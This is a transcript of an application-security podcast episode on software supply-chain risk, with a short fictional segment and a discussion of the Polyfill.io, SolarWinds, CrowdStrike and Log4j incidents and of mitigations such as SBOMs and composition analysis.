Podcasts

Episode 4: Another Code Brick in the Wall

Software supply-chain security is one aspect of cybersecurity that affects every sizable application out there and also every organization that uses web apps and APIs. Application frameworks and libraries make up much of the running code base of modern software—and it only takes one vulnerable or compromised component to create a critical security gap.
 
In this episode, Frank Catucci and Dan Murphy go into supply-chain security and look at several high-profile breaches caused by insecure components and dependencies. In the fiction segment, Alice the head dev realizes that vulnerable library the CISO is asking about is used in lots and lots of places…

December 17, 2024

Transcript

Episode Four: Another Code Brick in the Wall

Alice really didn’t want to go to work today. She had an early morning call organized by Bob, the new CISO, to go over some random legacy site that everyone assumed she knew about—simply because she had been at the company, working on something totally different, around the same time it was created. At least she got to miss the morning standup. She was honestly only half paying attention, swiping left and right on the flood of IMs that she could barely keep up with. But her ears perked up when she heard Bob speaking:

“Can anyone confirm if we are actually using TrolleySpill?”

Alice remembered hearing something about that in the Taut channel where the black-hoodie crew of the AppSec team hung out. TrolleySpill was some popular JavaScript package used in hundreds of thousands of sites, from what she recalled. It had been created as a free tool to make web developers’ lives easier—a way to easily drop in compatibility with old browsers. People started using it and including it on their sites. It was a free lunch; what could possibly go wrong?

But then the maintainer got burned out and sold the source control account and the domain that hosted the code to a sketchy company. That company, in turn, decided to monetize the install base. They had code trusted and running in hundreds of thousands of sites. It was as if your favorite local salad shop, which had been dutifully delivering high-quality produce every day, had been sold to some big soulless profit-chasing chain, and the regular delivery was now infested with vermin. What once was green and good had now been corrupted.

Alice was zoning in and out and decided to just check out the site in question. She opened the source and did a Control-F search for the compromised domain in the HTML. Oh no, oh no, oh no, oh no…

Her laptop fan kicked on. The site became slow, as if gravity had tripled. She fought against the weight and popped open her browser’s dev tools. What were all these scripts coming in from weird misspellings of big tech sites? And what was that repeated request from an image tag to a transparent GIF hosted somewhere else? 

Wait—was that her session cookie appended to the URL?

Didn’t this crappy old site have a way that you could just see your old password? Had she used SSO, or had she just accidentally leaked a way to get her corporate password? The site slowed to a crawl. An iframe stacking ads for things not entirely safe for work started to bloom like rot on the page. Finally, her browser gave up and displayed, “The following pages have become unresponsive. Do you want to cloose them?” The word “close” was spelled wrong—“cloose.” It was a trap.

Control W, control W, control slam that tab closed… Alice cleared her throat.

“Um, Bob, sorry to interrupt, but I just checked to see if we use TrolleySpill on that site. We do. A lot.”

Bob’s mind flashed back to a weekend in a cold December when he found out about another supply chain attack. His eye began to twitch uncontrollably as he remembered the horror of the first few hours of that incident. He paused for a moment and then asked the question everyone was thinking.

“And, uh, if we use it on that site, how many other apps do we have in the organization that use that?”

Alice typed for a few moments. “If we consider all of the partners, all of the dev branches that were deployed but never cleaned up, that would be 152 that we know about. Oh, and then there’s all the ones from that dead project. Uh, that’s like another 50. And we did that weird microsite back then. Uh, I think that branched from the code… Can we go with ‘lots’?”

The nightmare was becoming more real. Bob spoke slowly. “There is no way we can check all that. We wouldn’t even know where to begin.”


Frank Catucci: Hello and welcome to another episode of AppSec Serialized. I’m your host, Frank Catucci, and with me as always is Dan Murphy. Our topic today is supply chain security. Dan, this is an issue that’s been ongoing for a number of years and is still highly impactful to a large number—or nearly every—organization out there.

Dan: Oh yeah, definitely.

Frank: One of the things for me when we talk about this is looking at the evolution of how software is written these days—modern software development, modern application development—as opposed to how it was written 15 years ago. I think that’s part of the reason why this is still such a hot topic. You’d think we’d have had enough time to examine all the different aspects of this evolution and made some progress, but despite the progress we’ve made, it’s still a very relevant conversation. You know what I mean? It’s something that continues to affect everyone today. What are your thoughts on that?

Dan: Supply chain security is interesting because it’s something that has continued to impact us as applications grow more complicated. I like to use a metaphor here about software being built from Lego blocks. Back in the day, you had pretty basic blocks—your square ones, your long ones, your 2x2s—but nowadays there are a lot of specialized Lego pieces. You can have half of the model being built entirely from one part, and the number of Lego pieces used has just exploded. 

Modern apps are composed of many, many individual bricks that are sometimes just downloaded from the internet without going through the same rigorous process that’s applied internally to software written in-house—things like code review, static analysis, or security testing with a DAST tool. Sometimes when you’re getting it off the internet, you don’t ask questions about what rigor has been applied, where it’s come from, or what its origin is. Those Lego blocks that you end up putting into your solution sometimes have cracks, and when they’re at the bottom, the whole model can topple down. So, I believe we’ve got apps now that are built with a degree of unknowable complexity in terms of their dependencies that we really haven’t seen before. 

I actually had a personal experience last week. I was prototyping some code in this glorious haze of ChatGPT-assisted development, and I needed to clean out a dependencies directory for a TypeScript project I was working on. I ran an “rm -rf” on the directory, and it took a while to respond. The reason it took so long was that I realized I had introduced so many third-party dependencies into what was supposed to be a pretty simple app. The stack had become so big that the code I was writing was at the top of a pyramid sitting on top of all these different layers. In software security, all it takes is just one of those layers in the pyramid to have a crack. 

So supply chain security is here to stay, and I think it’s here to stay as our solutions grow more complex and our dependency chains grow longer and longer. It becomes so much more important.

Frank: You brought up something super interesting there that I want to dive into a little deeper. You mentioned things like manual code review. Let’s be completely honest—how many of those third-party libraries or dependencies are actually going through any type of manual code review with the same level of scrutiny as the first-party code written by yourself or a key contributing developer? How often would you say that folks out there are actually looking at those Lego blocks and doing a full assessment with the same rigor, including manual code review, as they would for first-party code? 

Dan: The answer is that it varies. In an open-source project, sometimes you can have a maintainer who’s incredibly diligent—a sort of benevolent dictator—reviewing every single line and making sure everything is up to par. You can have high-quality code out there, but when you have a wide, wide chain of dependencies, security becomes an issue where all you need is one gap. 

Even if you consider the average quality to be high, even if there are great people out there doing a lot of social good by staying diligent, all it takes is for one person to slack off, or for one burned-out developer to miss something. We’ve seen threat actors take advantage of burned-out open-source developers to sneak something malicious into the code. So, I think it varies quite a bit. When it varies, you have no way of knowing, so from a threat modeling perspective, you have to assume the worst. 

If your app has a thousand external dependencies, even if you assume a 90% quality rate, when you multiply that by the number of dependencies, the math doesn’t work out so well.

Frank: But even if you have a maintainer or author who is very diligent in reviewing the code before it’s pushed, as an end-user or consumer of those blocks—those different libraries or pieces—you still need to do your own reviews of that code, regardless of whether it’s from someone you trust or has been previously reviewed by another party. 

That’s something we can’t rely on; we need to make sure that we’re looking at it ourselves. It becomes difficult with the volume of libraries and code we’re using. It just becomes really untenable to look through every line like you would with first-party code, instead of relying on somebody else to do that, and that’s where things really get complicated.

Dan: There have been some recent incidents that really reinforce the risks we face in cybersecurity. Sometimes, what was once good can go bad, much like milk left out on the counter. A great example of this is the Polyfill vulnerability that emerged recently. In that case, we had a third-party package called Polyfill, used on hundreds of thousands of websites. It was originally designed to provide compatibility with older browsers and was a very useful piece of software, especially a few years ago when there was more diversity in the front-end ecosystem. It allowed developers to add new functionality to browsers that didn’t yet support certain features. For many years, it was a fine, trustworthy package that did its job well.

However, in February 2024, something happened. The developer who originally created Polyfill sold it to a different company. This meant that the address inside the npm namespace, the repository for all JavaScript libraries, was now controlled by someone else. It’s kind of like your favorite pizza joint that suddenly changes ownership while keeping the same name—you no longer know what’s in the ingredients. In this case, the “pizza joint” was taken over by someone with a nefarious purpose. They began embedding malicious scripts into all the websites that were using the package.

Polyfill was distributed via a content delivery service, which is a way to serve JavaScript from another location, ideally closer to the customer, reducing transmission times. Many people were still downloading the package from the Polyfill.io CDN, unaware that what was once a perfectly good resource had gone bad. The malicious code began executing various attacks, such as using CPU cycles to mine cryptocurrency, injecting malware, or driving ad revenue through shady means. 

This was impactful because it was perfectly fine and perfectly good before this change. It wasn’t something that, even if someone had done a review at the time of introduction, would have raised any red flags. An internal review board would have likely said, “Yeah, this is great, this is well-maintained, this is used everywhere, it ticks all the boxes”—until it doesn’t. So, oftentimes, even when that due diligence is done at the front end of a project, when you’re selecting a library for use, you’re going to look at it and say, “Okay, is this good?” But once it’s in, it can change very easily, and it’s easy to let scrutiny lapse as we take updates to software. 

It’s very easy to just install the latest version and assume everything’s okay. In fact, this deployment was taken advantage of because it was downloading from this location on the content delivery network, so the latest version was always in use. But when that latest version goes bad, that’s when we have problems.

Frank, what are some other supply chain attacks with which you’re familiar, that you’ve got personal memories of? 

Frank: You know, there’s one that—it was a little while ago, right, so some time has passed—but it eerily reminds me of the classic supply chain attack you mentioned, where you always have to rely on something that’s trusted, from a trusted location. And that would be—let’s go back and look at SolarWinds, right? Let’s look at the impact that the SolarWinds attack had.

Now, let’s look at this in chronological order. In September 2019, attackers were able to gain access to the SolarWinds network. So that, in itself, was a separate attack that was successful, and the attackers were like, “Hey, we have access now to the SolarWinds network.” They started to test their code injection as part of this access in October 2019. This is where things get interesting. About four months later—and now, what occurred in those four months, I think, is interesting because when you have four months of access to hone and practice your skill of essentially being able to inject malicious code into products from an internal network, you’re going to get to a position that you feel pretty good about, right? 

We’re talking four months of probably basic trial and error and practice. They ended up injecting malicious code called Sunburst into the Orion product that SolarWinds distributes. In March, SolarWinds began distributing those Orion updates. And when that got pushed out, it was an update that contained all of that malicious code. Once the victim’s system was compromised, it gave the attacker internal access again to all of those machines on the customer side that were running the SolarWinds Orion software. 

So, you started out with one internal compromise, then you inject malicious code. That malicious code looks like it’s trusted, right? So, you as a consumer are trusting that update coming from SolarWinds that has malicious code. That malicious code makes it onto your systems, and now you have full access to all of the customer systems from that malicious software that came from the trusted source. This is something that is absolutely incredible when you talk about a trusted source becoming compromised and the impact that can occur. You know, SolarWinds, like other software out there, is very widely used in federal government and infrastructure, in the private sector as well as the public sector. So, these are things that can have tremendous impact, and this is one that is still felt, I think, today.

A little bit of an aside from software supply chains—let’s look at the dangers of pushing out updates that are malicious from a trusted source. I don’t want to pick the scab too soon, but in one case, something that wasn’t malicious—like a corrupted driver—gets pushed out at the kernel level from CrowdStrike and ends up taking down critical infrastructure across our entire globe, essentially. And, I mean, that wasn’t malicious on purpose.

Dan: One of the things that’s interesting about that is, if you’re a threat actor and you realize that, wow, even though this was a mistake—like a null byte file that trusted kernel code was verifying and wasn’t prepared to deal with—that actually opens up a lot of eyes in terms of risk. Look at the amount of economic damage that was able to be done by a few null bytes in the wrong place. I think that’s the sort of thing a threat actor looks at and thinks, “Oh, you know what, I could do that.” Imagine how widespread—even just an update that’s not necessarily code—by hitting that supply chain, it’s a way to amplify those efforts and provide a lot of return on investment. It magnifies and it’s a bit of a wakeup call.

Frank: Yeah, absolutely. I mean, just today, if you’re talking about impact, we have a major airline that is now under federal investigation from the Secretary of Transportation. So, you know, these things have real impacts.

Now, that being said, I think we would be remiss not to talk about our classic example, the one that ruined another weekend—and that was Log4j, right? 

Dan: You know, CrowdStrike was on a Friday; Log4j, I’m pretty sure, was either a Thursday or a Friday, from what I remember. These things always seem to happen at the worst possible time.

Frank: Log4j might have started on a Thursday night, Eastern time, but the technical impact was definitely felt on Friday.

Dan: The Log4j vulnerability was interesting, right? For those not familiar, this was an open-source component—a Lego brick, if you will, from our earlier analogy—that was very widespread. It was free, it was good, and pretty much any large enterprise Java code had this running inside of it. But it was vulnerable. It had a flaw where an attacker could exploit it easily. The attack vector was simple: all a bad guy had to do was get the software using this third-party library to log some text that contained a string under the attacker’s control. Now, if you consider some exploits where an attacker has to, like, Matrix-style dodge through, backflip over things, and pull off some complex moves—this wasn’t that. This was the equivalent of just going up and knocking on the front door and having it simply open. It was a very easy-to-exploit attack vector, combined with the ultimate power of remote code execution (RCE).

What would happen is that the attacker could send a special string that contained what’s known as a JNDI URL. This URL would instruct the system to log something and bind to an LDAP server at a URL controlled by the attacker. The system would then download something from that server, and in the context of the Java ecosystem, it was loaded as Java object data, which meant deserialization—leading to the execution of code. So, basically, a machine vulnerable to Log4j had a severe vulnerability where an attacker could send a particular command that would tell the software to go out to the internet, download, and execute code of their choosing.

That was about as bad as it could get. I remember the mounting horror as everyone scrambled to determine whether or not their code was old enough to have the vulnerability. And there were aftershocks, too. It wasn’t just one issue; there was the big one, and then after that, a whole bunch of scrutiny was directed at that particular package. Some of us had to patch twice; it was painful. 

Frank: Or even two or three times, right?

Dan: Yep, and even then, just like with CrowdStrike, there were people celebrating being so old that they weren’t vulnerable. The same thing happened with Log4j—there were some versions that were ancient and not vulnerable. But that’s grim solace; it’s not really a good thing. I, for one, don’t want to fly on an airline that’s running Windows 3.1, personally.

Frank: I’m with you there. 

One thing that I want to point out is that this was something that was essentially open and available, being used across multiple—probably hundreds, tens of thousands of—applications or different types of applications for various purposes. This was something that almost every organization probably had at some point, somewhere in their own software or in third-party software they were using. 

So, it wasn’t necessarily a product-specific type of attack; it was more of a component-level attack. But that component was so common across multiple different types of software, whether first-party or third-party, that the impact was incredible. It doesn’t have to be from a specific trusted source; it’s just a source that’s implemented. I don’t think we’re done with this yet. There’s so much out there that it’s going to continue to be interesting.

Dan: When we define supply chain security, it can be broad, but with that disclaimer that it is a broad term, how widespread is it? How many organizations do you think have had to deal with a supply chain security attack? What do you see out there? 

Frank: This is something I’ve been looking at carefully. I would say in 2022, the data I have states that around 80% of enterprises had some type of software supply chain incident. To me, that was astronomical. However, a 2024 survey from ESG stated that 91% of organizations have experienced a software supply chain incident in the past 12 months. So, you went from 80% in 2022 saying they’ve ever had an incident with a software supply chain, to 2024 where more than 9 out of 10 were impacted by a software supply chain incident in the past 12 months. That is an incredible statistic. 

If you’re an enterprise, you have a 90% chance that you’re going to have one if you haven’t had one in the past 12 months, which you probably have. You’re going to have one in the near future. Just that impact alone, and that percentage, needs to be taken more seriously and acted upon with, I would say, a little more priority, especially given the impact. 91% is a staggering number within the last 12 months.

Dan: That is a very big number. But when we talk about the threats, what about mitigation? What can we do about it? 

Frank: There are some things where we are limited. If we have a trusted software package where we’re taking updates or auto-updates, those are tough to plug all the holes. There’s always going to be some level of risk with accepting those types of updates. But if we take a broader look at this, at software supply chain as a whole, what are some things we can do to be more secure from this standpoint? 

We touched upon some of this earlier, but it’s about trust and verification, right? We need to understand two things: first, what our software is running. We need a comprehensive list, an SBOM (Software Bill of Materials), of everything the software is running—every piece, every Lego brick that makes up the pyramid, or however you want to visualize that model. It’s crucial to understand what’s included in there, so you need an accurate list. But that accurate list is just scratching the surface. It’s like knowing the inventory—it’s hard to protect what you don’t know you have. You need to conduct a discovery process to ensure you’re fully understanding the detailed inventory of those Lego bricks or pieces.

The second point is maintaining the same level of standards and scrutiny that you would with first-party code. You need to make sure you’re looking at the libraries and versions of those libraries, and that you’re doing code testing on them as well. Just because you didn’t write it doesn’t mean you should ignore security findings or issues flagged by tools like SAST. 

Dan: One thing that is nice about this problem is that it lends itself well to automation. There are SCA (software composition analysis) tools out there that can help. They produce that SBOM, that manifest of all the components, and they check if the versions in use are known to be secure. They also track how long it has been since those components were last updated. These tools can help with other aspects as well, such as identifying license violations. Generally speaking, there are robust databases that track CVEs (Common Vulnerabilities and Exposures), so if a vulnerability emerges in a widely-used package, these databases will be updated and will notify you about it. There are even vendors that can help you out if you don’t have access to the source code. 

We do a bunch of stuff at runtime where we analyze the public-facing surface of a web application using the same tools that an attacker might use. We check things like the version of the JavaScript framework in use, or whether the headers in your HTTP responses indicate a certain age or vulnerability in the software. With Polyfill, we were able to get a check out really quickly, within a day or two of it hitting the mainstream. It’s kind of cool because if you then encounter something that was once good but has now become problematic, you can get a notification. So, automation really helps in combating these issues. The scale and scope are such that it’s almost impossible to keep up without the appropriate tools, but fortunately, there are potential solutions available.

Frank: You bring up some good points. There are automated tools and processes to help with this, like SCA, and we also offer runtime component analysis. This isn’t just about what’s compiled into the application, but what’s actually being called, used, or exposed at runtime. This can also aid in prioritizing what to fix and when, and how immediate that fix needs to be. Another point to consider is that we’re under increasing scrutiny. As a result of incidents like SolarWinds, we now have executive orders signed by the president stating that you can’t ship code with critical or high vulnerabilities. This increased scrutiny is something we need to be very aware of going forward.

If we look across the board at how this is evolving, it’s clear that the focus goes beyond what we traditionally thought of as the software supply chain. We’re likely to see more expansion in federal leadership and scrutiny around issues like this. The software supply chain as a whole is going to face stricter and stricter regulations, and this is something we need to be well-prepared for in the future.

Credits

COMING SOON

Episode 5: CISO on the Seesaw

In this episode, Frank Catucci and Dan Murphy talk to a real-life CISO, Invicti’s own Matthew Sciberras, discussing the balancing skills required to define and apply application security policies with limited resources. In the story segment, Alice the head dev realizes her cherished new project will be delayed due to vulnerabilities—if only she had scanned earlier…

Latest Episodes

Build your resistance to threats. And save hundreds of hours each month.

Get a demo See how it works